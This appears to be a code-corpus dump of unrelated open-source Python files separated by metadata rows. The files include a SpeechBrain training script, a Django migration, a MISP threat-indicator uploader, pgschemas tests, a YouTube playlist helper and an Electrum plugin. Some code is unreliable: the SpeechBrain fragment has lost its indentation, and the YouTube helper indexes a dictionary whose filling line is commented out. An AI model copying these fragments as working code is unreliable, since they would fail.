sb.dataio.dataset.set_output_keys(datasets, ["id", "sig", "spk_id_encoded"])
return train_data, valid_data, label_encoder
if __name__ == "__main__":
# This flag enables the inbuilt cudnn auto-tuner
torch.backends.cudnn.benchmark = True
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
# Initialize ddp (useful only for multi-GPU DDP training)
sb.utils.distributed.ddp_init_group(run_opts)
# Load hyperparameters file with command-line overrides
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# Download verification list (to exlude verification sentences from train)
veri_file_path = os.path.join(
hparams["save_folder"], os.path.basename(hparams["verification_file"])
)
download_file(hparams["verification_file"], veri_file_path)
# Dataset prep (parsing VoxCeleb and annotation into csv files)
from voxceleb_prepare import prepare_voxceleb # noqa
run_on_main(
prepare_voxceleb,
kwargs={
"data_folder": hparams["data_folder"],
"save_folder": hparams["save_folder"],
"verification_pairs_file": veri_file_path,
"splits": ["train", "dev"],
"split_ratio": [90, 10],
"seg_dur": hparams["sentence_len"],
},
)
# Dataset IO prep: creating Dataset objects and proper encodings for phones
train_data, valid_data, label_encoder = dataio_prep(hparams)
# Create experiment directory
sb.core.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# Brain class initialization
speaker_brain = SpeakerBrain(
modules=hparams["modules"],
opt_class=hparams["opt_class"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
# Training
speaker_brain.fit(
speaker_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["dataloader_options"],
valid_loader_kwargs=hparams["dataloader_options"],
)
| 34 | 85 | 0.646147 |
8a002813ec718f990c335a0eaf9b9b10703c3751 | 1,409 | py | Python | PARQUEIOT/apps/sistema/migrations/0003_auto_20160717_2239.py | Edwineverth/Parque-Inteligente-SD- | a25fe3e5ac974a151d2681a8001f2782747fb459 | [
"CC0-1.0"
] | null | null | null | PARQUEIOT/apps/sistema/migrations/0003_auto_20160717_2239.py | Edwineverth/Parque-Inteligente-SD- | a25fe3e5ac974a151d2681a8001f2782747fb459 | [
"CC0-1.0"
] | null | null | null | PARQUEIOT/apps/sistema/migrations/0003_auto_20160717_2239.py | Edwineverth/Parque-Inteligente-SD- | a25fe3e5ac974a151d2681a8001f2782747fb459 | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('sistema', '0002_dispositivo_dis_nombre'),
]
operations = [
migrations.AlterField(
model_name='dispositivo',
name='dis_fabricante',
field=models.CharField(max_length=50, verbose_name='Fabricante:'),
),
migrations.AlterField(
model_name='dispositivo',
name='dis_mac',
field=models.CharField(max_length=17, verbose_name='MAC:'),
),
migrations.AlterField(
model_name='dispositivo',
name='dis_nombre',
field=models.CharField(max_length=50, verbose_name='Nombre:'),
),
migrations.AlterField(
model_name='sensor',
name='id_dis',
field=models.ForeignKey(verbose_name='Dispositivo:', blank=True, to='sistema.Dispositivo', null=True),
),
migrations.AlterField(
model_name='sensor',
name='sen_nombre',
field=models.CharField(max_length=50, verbose_name='Nombre:'),
),
migrations.AlterField(
model_name='sensor',
name='sen_unidad_medida',
field=models.CharField(max_length=10, verbose_name='Unidad de Medida:'),
),
]
| 31.311111 | 114 | 0.587651 |
655c3545b94377f466d14883af33f5adad0c5743 | 3,754 | py | Python | Samples/MISP/script.py | OfficeGlobal/security-api-solutions | a19b412ae3aaff806d30197c19862017923398ba | [
"MIT"
] | null | null | null | Samples/MISP/script.py | OfficeGlobal/security-api-solutions | a19b412ae3aaff806d30197c19862017923398ba | [
"MIT"
] | null | null | null | Samples/MISP/script.py | OfficeGlobal/security-api-solutions | a19b412ae3aaff806d30197c19862017923398ba | [
"MIT"
] | null | null | null | from pymisp import PyMISP
import config
from collections import defaultdict
import datetime
from RequestManager import RequestManager
from RequestObject import RequestObject
from constants import *
import sys
from functools import reduce
def _get_events():
misp = PyMISP(config.misp_domain, config.misp_key, config.misp_verifycert)
if len(config.misp_event_filters) == 0:
return [event['Event'] for event in misp.search(values="")['response']]
events_for_each_filter = [
[event['Event'] for event in misp.search(**event_filter)['response']]
for event_filter in config.misp_event_filters
]
event_ids_for_each_filter = [set(event['id'] for event in events) for events in events_for_each_filter]
event_ids_intersection = reduce((lambda x, y: x & y), event_ids_for_each_filter)
return [event for event in events_for_each_filter[0] if event['id'] in event_ids_intersection]
def _graph_post_request_body_generator(parsed_events):
for event in parsed_events:
request_body_metadata = {
**{field: event[field] for field in REQUIRED_GRAPH_METADATA},
**{field: event[field] for field in OPTIONAL_GRAPH_METADATA if field in event},
'action': config.action,
'passiveOnly': config.passiveOnly,
'threatType': 'watchlist',
'targetProduct': config.targetProduct,
}
for request_object in event['request_objects']:
request_body = {
**request_body_metadata.copy(),
**request_object.__dict__,
'tags': request_body_metadata.copy()['tags'] + request_object.__dict__['tags']
}
yield request_body
def _handle_timestamp(parsed_event):
parsed_event['lastReportedDateTime'] = str(
datetime.datetime.fromtimestamp(int(parsed_event['lastReportedDateTime'])))
def _handle_diamond_model(parsed_event):
for tag in parsed_event['tags']:
if 'diamond-model:' in tag:
parsed_event['diamondModel'] = tag.split(':')[1]
def _handle_tlp_level(parsed_event):
for tag in parsed_event['tags']:
if 'tlp:' in tag:
parsed_event['tlpLevel'] = tag.split(':')[1]
if 'tlpLevel' not in parsed_event:
parsed_event['tlpLevel'] = 'red'
def main():
if '-r' in sys.argv:
RequestManager.read_tiindicators()
sys.exit()
config.verbose_log = ('-v' in sys.argv)
print('fetching & parsing data from misp...')
events = _get_events()
parsed_events = list()
for event in events:
parsed_event = defaultdict(list)
for key, mapping in EVENT_MAPPING.items():
parsed_event[mapping] = event.get(key, "")
parsed_event['tags'] = [tag['name'].strip() for tag in event.get("Tag", [])]
_handle_diamond_model(parsed_event)
_handle_tlp_level(parsed_event)
_handle_timestamp(parsed_event)
for attr in event['Attribute']:
if attr['type'] == 'threat-actor':
parsed_event['activityGroupNames'].append(attr['value'])
if attr['type'] == 'comment':
parsed_event['description'] += attr['value']
if attr['type'] in MISP_ACTIONABLE_TYPES:
parsed_event['request_objects'].append(RequestObject(attr))
parsed_events.append(parsed_event)
del events
total_indicators = sum([len(v['request_objects']) for v in parsed_events])
with RequestManager(total_indicators) as request_manager:
for request_body in _graph_post_request_body_generator(parsed_events):
print(f"request body: {request_body}")
request_manager.handle_indicator(request_body)
if __name__ == '__main__':
main()
| 37.168317 | 107 | 0.661694 |
5d038469afe98dca5d4733e65d15dc53828be670 | 178 | py | Python | src/mard/brazilian_document/__init__.py | Mardoqueu-Pimentel/mard-py | c448cf5803291a6b711ad1ea6062cbab30dbfa0c | [
"MIT"
] | null | null | null | src/mard/brazilian_document/__init__.py | Mardoqueu-Pimentel/mard-py | c448cf5803291a6b711ad1ea6062cbab30dbfa0c | [
"MIT"
] | 1 | 2020-03-12T17:57:53.000Z | 2020-03-24T20:36:44.000Z | src/mard/brazilian_document/__init__.py | Mardoqueu-Pimentel/mard-py | c448cf5803291a6b711ad1ea6062cbab30dbfa0c | [
"MIT"
] | null | null | null | from mard.brazilian_document.cnpj import (
cnpj_pattern, cnpj_formatter, cnpj_validator
)
from mard.brazilian_document.cpf import (
cpf_pattern, cpf_formatter, cpf_validator
)
| 25.428571 | 45 | 0.831461 |
250e7cf87ac4038880a7d94b45ab58f827e7ee0e | 2,350 | py | Python | ctdvis/widgets/paragraph.py | JohannesSMHI/ctdvis | f51d472eb59c032abcbf598c94c4480d952ac30a | [
"MIT"
] | null | null | null | ctdvis/widgets/paragraph.py | JohannesSMHI/ctdvis | f51d472eb59c032abcbf598c94c4480d952ac30a | [
"MIT"
] | null | null | null | ctdvis/widgets/paragraph.py | JohannesSMHI/ctdvis | f51d472eb59c032abcbf598c94c4480d952ac30a | [
"MIT"
] | null | null | null | # Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-09-11 15:33
@author: a002028
"""
from bokeh.models import Div
def header_line():
"""Return Div object."""
html_text = """
<html>
<body>
<hr>
</body>
</html>
"""
return Div(text=html_text)
def standard_block_header(text=None, width=300, height=40):
"""Return Div object."""
html_text = """
<style>
body {
text-align: left;
vertical-align: text-top;
}
.centered {
text-align: text-top;
vertical-align: text-top;
}
</style>
<div class="centered">
<h4>""" + text + """</h4>
</div>
"""
return Div(text=html_text, width=width, height=height)
def get_info_block():
"""Return Div object."""
text = """
<h4>Info links</h4>
<ul>
<li><a href="https://docs.bokeh.org/en/latest/docs/user_guide/tools.html" target="_blank">Bokeh toolbar info</a></li>
<li><a href="https://github.com/sharksmhi/sharkpylib/tree/master/sharkpylib/qc" target="_blank">SHARK-QC-library</a></li>
</ul>
<h4>QC routines</h4>
<ol>
<li>Range check</li>
<li>Increase check</li>
<li>Decrease check</li>
<li>Sensor diff check</li>
<li>Spike check</li>
</ol>
""" # noqa: E501
return Div(text=text, width=200, height=100)
def get_export_info_block(export_folder):
"""Return Div object."""
if export_folder:
text = f"""
<h4>Download steps:</h4>
<ol>
<li>Select series using "map-lasso" or "Shift-table-select"</li>
<li>Click on Download below</li>
</ol>
Datafiles will be downloaded to your data folder ({export_folder})
""" # noqa: E501
else:
text = """
<h4>Download steps:</h4>
<ol>
<li>Select series using "map-lasso" or "Shift-table-select"</li>
<li>Click on Download below</li>
</ol>
Select a folder for download after clicking on the green button below. If no valid folder is selected, datafiles will be downloaded to your computers download-folder (eg. "Hämtade filer")
""" # noqa: E501
return Div(text=text)
| 27.647059 | 195 | 0.581277 |
263dc433ea89a49aa75961102c133aaa817bd99c | 9,395 | py | Python | dpgs_sandbox/tests/test_apps.py | ktowen/django-pgschemas | 5487c82d7a44297e12b80ef899a9aee0b6879bc5 | [
"MIT"
] | 85 | 2019-01-03T02:22:03.000Z | 2022-03-09T23:15:56.000Z | dpgs_sandbox/tests/test_apps.py | ktowen/django-pgschemas | 5487c82d7a44297e12b80ef899a9aee0b6879bc5 | [
"MIT"
] | 52 | 2019-02-12T21:04:43.000Z | 2022-03-05T15:20:16.000Z | dpgs_sandbox/tests/test_apps.py | ktowen/django-pgschemas | 5487c82d7a44297e12b80ef899a9aee0b6879bc5 | [
"MIT"
] | 12 | 2019-01-31T02:36:06.000Z | 2021-06-15T22:06:12.000Z | from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, override_settings
BASE_DEFAULT = {"TENANT_MODEL": "shared_public.Tenant", "DOMAIN_MODEL": "shared_public.Domain", "URLCONF": ""}
class AppConfigTestCase(TestCase):
"""
Tests TENANTS settings is properly defined.
"""
def setUp(self):
self.app_config = apps.get_app_config("django_pgschemas")
@override_settings()
def test_missing_tenants(self):
del settings.TENANTS
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_tenant_dict()
self.assertEqual(str(ctx.exception), "TENANTS dict setting not set.")
@override_settings(TENANTS=list)
def test_wrong_type_tenants(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_tenant_dict()
self.assertEqual(str(ctx.exception), "TENANTS dict setting not set.")
@override_settings(TENANTS={})
def test_no_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'public' dict.")
@override_settings(TENANTS={"public": None})
def test_wrong_type_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'public' dict.")
@override_settings(TENANTS={"public": 4})
def test_other_type_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'public' dict.")
@override_settings(TENANTS={"public": {"URLCONF": ""}})
def test_urlconf_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'URLCONF' key.")
@override_settings(TENANTS={"public": {"WS_URLCONF": ""}})
def test_wsurlconf_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'WS_URLCONF' key.")
@override_settings(TENANTS={"public": {"DOMAINS": ""}})
def test_domains_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'DOMAINS' key.")
@override_settings(TENANTS={"public": {"FALLBACK_DOMAINS": ""}})
def test_fallback_domains_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'FALLBACK_DOMAINS' key.")
@override_settings(TENANTS={})
def test_no_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'default' dict.")
@override_settings(TENANTS={"default": None})
def test_wrong_type_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'default' dict.")
@override_settings(TENANTS={"default": "wawa"})
def test_other_type_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'default' dict.")
@override_settings(TENANTS={"default": {"DOMAIN_MODEL": ""}})
def test_no_tenant_model_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] must contain a 'TENANT_MODEL' key.")
@override_settings(TENANTS={"default": {"TENANT_MODEL": ""}})
def test_no_domain_model_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] must contain a 'DOMAIN_MODEL' key.")
@override_settings(TENANTS={"default": {"TENANT_MODEL": None, "DOMAIN_MODEL": None}})
def test_no_urlconf_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] must contain a 'URLCONF' key.")
@override_settings(TENANTS={"default": {**BASE_DEFAULT, "DOMAINS": ""}})
def test_domains_on_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] cannot contain a 'DOMAINS' key.")
@override_settings(TENANTS={"default": {**BASE_DEFAULT, "FALLBACK_DOMAINS": ""}})
def test_fallback_domains_on_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] cannot contain a 'FALLBACK_DOMAINS' key.")
def test_repeated_clone_reference(self):
with override_settings(TENANTS={"public": {}, "default": {**BASE_DEFAULT, "CLONE_REFERENCE": "public"}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default']['CLONE_REFERENCE'] must be a unique schema name.")
with override_settings(TENANTS={"default": {**BASE_DEFAULT, "CLONE_REFERENCE": "default"}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default']['CLONE_REFERENCE'] must be a unique schema name.")
def test_valid_schema_name(self):
with override_settings(TENANTS={"pg_whatever": {}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_overall_schemas()
self.assertEqual(str(ctx.exception), "'pg_whatever' is not a valid schema name.")
with override_settings(TENANTS={"&$&*": {}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_overall_schemas()
self.assertEqual(str(ctx.exception), "'&$&*' is not a valid schema name.")
@override_settings(TENANTS={"www": {}})
def test_domains_on_others(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_overall_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['www'] must contain a 'DOMAINS' list.")
@override_settings(DATABASE_ROUTERS=())
def test_database_routers(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_complementary_settings()
self.assertEqual(
str(ctx.exception), "DATABASE_ROUTERS setting must contain 'django_pgschemas.routers.SyncRouter'."
)
def test_extra_search_paths(self):
with override_settings(
TENANTS={"public": {}, "default": BASE_DEFAULT, "www": {}}, PGSCHEMAS_EXTRA_SEARCH_PATHS=["public"]
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'public' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
with override_settings(
TENANTS={"public": {}, "default": BASE_DEFAULT, "www": {}}, PGSCHEMAS_EXTRA_SEARCH_PATHS=["default"]
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'default' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
with override_settings(
TENANTS={"public": {}, "default": BASE_DEFAULT, "www": {}}, PGSCHEMAS_EXTRA_SEARCH_PATHS=["www"]
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'www' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
with override_settings(
TENANTS={"public": {}, "default": {**BASE_DEFAULT, "CLONE_REFERENCE": "sample"}, "www": {}},
PGSCHEMAS_EXTRA_SEARCH_PATHS=["sample"],
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'sample' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
@override_settings(TENANTS={"public": {}, "default": BASE_DEFAULT})
def test_all_good_here(self):
self.app_config.ready()
| 51.059783 | 119 | 0.687174 |
639ffacbcf7c6da21fd6e0653441b1d73a3268fe | 4,332 | py | Python | sloeplugins/sloeyoutube/sloeyoutubetree.py | sloe/chan | df144f30edd33eb749e39ccdf64687cc22449bf5 | [
"Apache-2.0"
] | 1 | 2018-01-05T11:36:50.000Z | 2018-01-05T11:36:50.000Z | sloeplugins/sloeyoutube/sloeyoutubetree.py | sloe/chan | df144f30edd33eb749e39ccdf64687cc22449bf5 | [
"Apache-2.0"
] | null | null | null | sloeplugins/sloeyoutube/sloeyoutubetree.py | sloe/chan | df144f30edd33eb749e39ccdf64687cc22449bf5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import cPickle
import logging
import os
from pprint import pformat, pprint
import time
import sloelib
from sloeyoutubeitem import SloeYouTubeItem
class SloeYouTubeTree(object):
IDMAP_CACHE_FILENAME = "youtubetree_idmap_cache.pickle"
IDMAP_CACHE_VALID_FILENAME = "youtubetree_idmap_cache.valid"
def __init__(self, session):
self.session = session
self.item_list = {}
self.id_map = {}
def _save_cache(self):
logging.info("Saving ID map cache from %s" % self.IDMAP_CACHE_FILENAME)
if os.path.exists(self.IDMAP_CACHE_VALID_FILENAME):
os.unlink(self.IDMAP_CACHE_VALID_FILENAME)
with open(self.IDMAP_CACHE_FILENAME, "wb") as file:
if file:
cPickle.dump(self.id_map, file)
with open(self.IDMAP_CACHE_VALID_FILENAME, "wb") as file:
file.write("Cache validated %s" % time.asctime())
def _load_cache(self):
if not os.path.exists(self.IDMAP_CACHE_VALID_FILENAME):
if os.path.exists(self.IDMAP_CACHE_FILENAME):
logging.warn("Ignoring cache file %s as not valid" % self.IDMAP_CACHE_FILENAME)
else:
logging.info("Loading ID map cache from %s" % self.IDMAP_CACHE_FILENAME)
file = open(self.IDMAP_CACHE_FILENAME, "rb")
if file:
id_map = cPickle.load(file)
self.id_map = id_map
def _get_channels(self):
channels = self.session().channels()
channel_list = channels.list(
mine=True,
part="contentDetails"
)
return channel_list.execute()["items"]
def read(self):
self._load_cache()
updated = True
for channel in self._get_channels():
uploads_list_id = channel["contentDetails"]["relatedPlaylists"]["uploads"]
playlistitems_list_request = self.session().playlistItems().list(
playlistId=uploads_list_id,
part="snippet",
maxResults=50
)
while playlistitems_list_request:
playlistitems_list_response = playlistitems_list_request.execute()
video_ids = []
video_specs = []
for playlist_item in playlistitems_list_response["items"]:
video_id = playlist_item["snippet"]["resourceId"]["videoId"]
video_spec = playlist_item["snippet"]
video_spec[u"sloemodified"] = False
video_ids.append(video_id)
video_specs.append(video_spec)
videolistitems_list_request = self.session().videos().list(
part=" id, snippet, contentDetails, fileDetails,liveStreamingDetails,player,processingDetails,recordingDetails,statistics,status,suggestions,topicDetails",
id = u",".join(video_ids)
)
videolistitems_list_response = videolistitems_list_request.execute()
for i, v in enumerate(videolistitems_list_response["items"]):
video_specs[i][u"sloevideo"] = v
for i, video_id in enumerate(video_ids):
# self.item_list[video_id] = SloeYouTubeItem(video_specs[i])
self.item_list[video_id].update_video_description("Sloecoach test video")
self.item_list[video_id].set_sloeid_tag("01234567890")
playlistitems_list_request = self.session().playlistItems().list_next(
playlistitems_list_request, playlistitems_list_response)
if updated:
self._save_cache()
def write(self):
for item_id, item in self.item_list.iteritems():
if item.get("sloemodified"):
logging.info("Item %s is modified - updating" % item_id)
self.update_item(item)
def update_item(self, item):
sloevideo = item.get("sloevideo")
videos_update_request = self.session().videos().update(
part="snippet",
body={
"id":sloevideo["id"],
"snippet":sloevideo["snippet"]
})
videos_update_request.execute()
def __repr__(self):
return "|YouTubeTree|%s" % pformat(self.item_list)
| 34.656 | 175 | 0.605494 |
d5845d5a701ac065d07651ac164419ff0bceff2d | 515 | py | Python | server/src/tests/samples/tryExcept1.py | jhutchings1/pyright | 2b8593a58a2aecc95dac49cce92fc16678cd4e14 | [
"MIT"
] | 1 | 2019-09-14T06:02:16.000Z | 2019-09-14T06:02:16.000Z | server/src/tests/samples/tryExcept1.py | jhutchings1/pyright | 2b8593a58a2aecc95dac49cce92fc16678cd4e14 | [
"MIT"
] | 4 | 2021-03-11T07:03:36.000Z | 2021-10-06T22:27:25.000Z | server/src/tests/samples/tryExcept1.py | jhutchings1/pyright | 2b8593a58a2aecc95dac49cce92fc16678cd4e14 | [
"MIT"
] | null | null | null | # This sample tests the name binder's handling of
# try/except/raise statements
def func1():
try:
pass
except:
raise
# This should generate an error because it's
# a "naked" raise statement.
raise
def foo(x, y) -> bool:
try:
z = x / y
except Exception as e:
return False
except:
raise Exception()
else:
return True
# This should not generate an error
# because this code is unreachable.
return 'hello'
| 16.09375 | 49 | 0.576699 |
f80326043c617c93d131993981bedc2f630bf3c6 | 2,786 | py | Python | electrum_pac/plugins/labels/qt.py | PACCommunity/electrum-PAC | bde9018f026c950de16ddab96e4ef818ded52566 | [
"MIT"
] | 2 | 2018-05-12T19:55:42.000Z | 2019-09-04T12:14:40.000Z | electrum_pac/plugins/labels/qt.py | PACCommunity/electrum-PAC | bde9018f026c950de16ddab96e4ef818ded52566 | [
"MIT"
] | null | null | null | electrum_pac/plugins/labels/qt.py | PACCommunity/electrum-PAC | bde9018f026c950de16ddab96e4ef818ded52566 | [
"MIT"
] | 15 | 2018-04-02T11:21:43.000Z | 2020-08-14T20:27:29.000Z | from functools import partial
import traceback
import sys
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import (QHBoxLayout, QLabel, QVBoxLayout)
from electrum_pac.plugin import hook
from electrum_pac.i18n import _
from electrum_pac.gui.qt import EnterButton
from electrum_pac.gui.qt.util import ThreadedButton, Buttons
from electrum_pac.gui.qt.util import WindowModalDialog, OkButton
from .labels import LabelsPlugin
class QLabelsSignalObject(QObject):
labels_changed_signal = pyqtSignal(object)
class Plugin(LabelsPlugin):
def __init__(self, *args):
LabelsPlugin.__init__(self, *args)
self.obj = QLabelsSignalObject()
def requires_settings(self):
return True
def settings_widget(self, window):
return EnterButton(_('Settings'),
partial(self.settings_dialog, window))
def settings_dialog(self, window):
wallet = window.parent().wallet
d = WindowModalDialog(window, _("Label Settings"))
hbox = QHBoxLayout()
hbox.addWidget(QLabel("Label sync options:"))
upload = ThreadedButton("Force upload",
partial(self.push_thread, wallet),
partial(self.done_processing_success, d),
partial(self.done_processing_error, d))
download = ThreadedButton("Force download",
partial(self.pull_thread, wallet, True),
partial(self.done_processing_success, d),
partial(self.done_processing_error, d))
vbox = QVBoxLayout()
vbox.addWidget(upload)
vbox.addWidget(download)
hbox.addLayout(vbox)
vbox = QVBoxLayout(d)
vbox.addLayout(hbox)
vbox.addSpacing(20)
vbox.addLayout(Buttons(OkButton(d)))
return bool(d.exec_())
def on_pulled(self, wallet):
self.obj.labels_changed_signal.emit(wallet)
def done_processing_success(self, dialog, result):
dialog.show_message(_("Your labels have been synchronised."))
def done_processing_error(self, dialog, result):
traceback.print_exception(*result, file=sys.stderr)
dialog.show_error(_("Error synchronising labels") + ':\n' + str(result[:2]))
@hook
def load_wallet(self, wallet, window):
# FIXME if the user just enabled the plugin, this hook won't be called
# as the wallet is already loaded, and hence the plugin will be in
# a non-functional state for that window
self.obj.labels_changed_signal.connect(window.update_tabs)
self.start_wallet(wallet)
@hook
def on_close_window(self, window):
self.stop_wallet(window.wallet)
| 35.265823 | 84 | 0.652548 |
ba94fe9a03c46edb200e124794ab920c585ba00f | 546 | py | Python | pyamf/adapters/_weakref.py | frewsxcv/pyamf2 | fcb61d2445b7e456121085320d1c713e33ae1f6a | [
"MIT"
] | null | null | null | pyamf/adapters/_weakref.py | frewsxcv/pyamf2 | fcb61d2445b7e456121085320d1c713e33ae1f6a | [
"MIT"
] | null | null | null | pyamf/adapters/_weakref.py | frewsxcv/pyamf2 | fcb61d2445b7e456121085320d1c713e33ae1f6a | [
"MIT"
] | null | null | null | # Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
C{weakref} support.
@since: 0.6.2
"""
import weakref
import pyamf
from pyamf.adapters import util
class Foo(object):
pass
weakref_type = type(weakref.ref(Foo()))
def get_referent(reference, **kwargs):
return reference()
pyamf.add_type(weakref_type, get_referent)
if hasattr(weakref, 'WeakValueDictionary'):
pyamf.add_type(weakref.WeakValueDictionary, util.to_dict)
if hasattr(weakref, 'WeakSet'):
pyamf.add_type(weakref.WeakSet, util.to_list)
| 14.756757 | 61 | 0.727106 |
484c1b9721dedd99be8602b3042b0f251c0dc82a | 1,070 | py | Python | src/core/src/tortuga/exceptions/invalidProfileCreationTemplate.py | sutasu/tortuga | 48d7cde4fa652346600b217043b4a734fa2ba455 | [
"Apache-2.0"
] | 33 | 2018-03-02T17:07:39.000Z | 2021-05-21T18:02:51.000Z | src/core/src/tortuga/exceptions/invalidProfileCreationTemplate.py | sutasu/tortuga | 48d7cde4fa652346600b217043b4a734fa2ba455 | [
"Apache-2.0"
] | 201 | 2018-03-05T14:28:24.000Z | 2020-11-23T19:58:27.000Z | src/core/src/tortuga/exceptions/invalidProfileCreationTemplate.py | sutasu/tortuga | 48d7cde4fa652346600b217043b4a734fa2ba455 | [
"Apache-2.0"
] | 23 | 2018-03-02T17:21:59.000Z | 2020-11-18T14:52:38.000Z | # Copyright 2008-2018 Univa Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tortuga.exceptions.tortugaException import TortugaException
from tortuga.utility import tortugaStatus
class InvalidProfileCreationTemplate(TortugaException):
"""
Raised from either createSoftwareProfileFromTemplate() or
createHardwareProfileFromTemplate()
"""
def __init__(self, error="", **kwargs):
TortugaException.__init__(
self, error,
tortugaStatus.TORTUGA_INVALID_PROFILE_CREATION_TEMPLATE_ERROR,
**kwargs)
| 36.896552 | 74 | 0.752336 |
5394219197dc663d676f0610b2346a671b882a34 | 20,813 | py | Python | xonsh/base_shell.py | hemna/xonsh | 86c4dec1bb5df1905b65ef553b06fdb5c76b20a8 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2022-02-14T21:56:41.000Z | 2022-02-14T21:56:41.000Z | xonsh/base_shell.py | hemna/xonsh | 86c4dec1bb5df1905b65ef553b06fdb5c76b20a8 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xonsh/base_shell.py | hemna/xonsh | 86c4dec1bb5df1905b65ef553b06fdb5c76b20a8 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
"""The base class for xonsh shell"""
import io
import os
import sys
import time
import builtins
from xonsh.tools import (
XonshError,
print_exception,
DefaultNotGiven,
check_for_partial_string,
format_std_prepost,
get_line_continuation,
)
from xonsh.platform import HAS_PYGMENTS, ON_WINDOWS
from xonsh.codecache import (
should_use_cache,
code_cache_name,
code_cache_check,
get_cache_filename,
update_cache,
run_compiled_code,
)
from xonsh.completer import Completer
from xonsh.prompt.base import multiline_prompt, PromptFormatter
from xonsh.events import events
from xonsh.shell import transform_command
from xonsh.lazyimps import pygments, pyghooks
from xonsh.ansi_colors import ansi_partial_color_format
if ON_WINDOWS:
import ctypes
kernel32 = ctypes.windll.kernel32 # type:ignore
kernel32.SetConsoleTitleW.argtypes = [ctypes.c_wchar_p]
class _TeeStdBuf(io.RawIOBase):
"""A dispatcher for bytes to two buffers, as std stream buffer and an
in memory buffer.
"""
def __init__(
self, stdbuf, membuf, encoding=None, errors=None, prestd=b"", poststd=b""
):
"""
Parameters
----------
